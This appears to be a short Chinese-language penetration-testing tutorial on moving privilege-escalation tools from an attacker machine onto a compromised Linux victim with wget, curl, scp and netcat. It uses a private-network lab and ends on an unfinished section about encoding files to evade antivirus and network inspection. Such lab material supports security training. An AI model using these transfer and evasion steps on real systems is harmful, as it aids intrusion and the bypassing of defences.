後滲透下載文件(Linux)

 後滲透下載文件(Linux)

作者 : Noth

前言 :
通常拿到 linux 主機權限後 xD 通常也是一樣會想辦法把提權工具載入到 victim 主機上面(做一些壞壞的事情，誤)，這一篇主要介紹幾種方式將 attacker 主機上面的檔案載入到 victim 上。 

wget 下載

wget <url>

實作環境 : 
attacker -> victim
攻擊者 : 192.168.179.144 , kali , 開啟 SimpleHTTPServer
受害者 : 192.168.179.146 , ubuntu

Curl 下載

attacker -> victim
curl <url> --output <File Path> 

scp 下載

attacker -> victim
scp <Local File> <victim'account>@<victim'ip>:/path/to/file

attack :

nc 下載

attacker -> victim

victim : 
nc -lvvp 4444 > 1.txt

attack : 
nc victim'ip 4444 < 1.txt

常見檔案編碼繞過設備檢查

有時會因為中間層設備或本地防毒軟體等規則設定，限制不允許潛在的惡意檔案通過，因此必須先將檔案先進行編碼或加密後才能順利傳輸